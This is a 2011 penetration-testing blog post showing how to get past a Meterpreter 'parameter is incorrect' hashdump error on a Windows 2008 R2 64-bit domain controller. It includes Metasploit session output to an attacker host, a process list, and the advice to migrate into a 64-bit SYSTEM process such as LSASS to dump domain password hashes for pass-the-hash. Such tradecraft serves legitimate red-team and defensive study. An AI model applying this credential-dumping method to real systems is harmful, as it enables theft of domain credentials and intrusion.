When trying to dump password hashes on a Windows 2008 R2 64 bit box I constantly run into the “The parameter is incorrect” error in meterpreter. So I’ve had to fall back on dropping binaries which I really don’t like doing because of the added clean up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12622 updated today (2011.05.15)
msf >
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011
msf > sessions -i 7
[*] Starting interaction with 7...
meterpreter > sysinfo
System Language : en_US
OS : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer : DOMAINCONTROLLE
Architecture : x64 (Current Process is WOW64)
Meterpreter : x86/win32
meterpreter > ps
Process list
============
PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System x64 0
224 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
324 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
364 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
372 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
404 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
468 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
476 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
484 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
628 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
708 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
804 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
836 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
880 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
932 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
972 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
328 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1172 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
1204 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
1252 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfsrs.exe
1288 dns.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dns.exe
1316 ismserv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\ismserv.exe
1360 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1392 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
1464 wlms.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wlmswlms.exe
1492 dfssvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\dfssvc.exe
1572 VMUpgradeHelper.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
1896 TPAutoConnSvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
2016 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
872 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
1268 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbemWmiPrvSE.exe
2360 taskhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\taskhost.exe
2424 dwm.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\dwm.exe
2452 explorer.exe x64 1 SITTINGDUCK\juser C:\Windows\explorer.exe
2504 TPAutoConnect.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
2512 conhost.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\conhost.exe
2632 VMwareTray.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2640 VMwareUser.exe x64 1 SITTINGDUCK\juser C:\Program Files\VMware\VMware Tools\VMwareUser.exe
2716 mmc.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\mmc.exe
3052 mscorsvw.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft.NET\Frameworkv4.0.30319\mscorsvw.exe
2216 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
1932 mscorsvw.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\Microsoft\.NET\Framework\64\v4.0.30319\mscorsvw.exe
2564 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1732 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\msdtc.exe
2992 notepad.exe x86 1 SITTINGDUCK\juser C:\Windows\SysWOW64\notepad.exe
1720 notepad.exe x64 1 SITTINGDUCK\juser C:\Windows\System32\notepad.exe
meterpreter > getpid
Current pid: 2992
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
Ah, the wonderful ‘The parameter is incorrect’ error. Ok we are an admin since we can see the user for SYSTEM processes, so that isn’t the issue, but lets do a ‘getprivs’ just in case:
w00t. So I don’t know why, but it seems that you have to be in a ‘SYSTEM’ process who’s primary token (started by SYSTEM) is SYSTEM (since ‘getsystem’ wasn’t working). I also tried this getting SYSTEM to run a 32 bit process, and was still unable to dump hashes. So next time you’re on an Win2k8 R2 64 bit box, remember to migrate into a pre-existing 64bit SYSTEM process and you should be good to go.
Update on 2011-05-15 23:39 by Rob Fuller
As Gavin points out in the comments, it is better to run the meterpreter script or post module to do hashdumping on systems. The only time this is not the case is when you are trying to get domain hashes on a domain controller. The registry does not store these hashes (as far as I know). So LSASS injection is the only route and you have to jump through the mentioned hoops.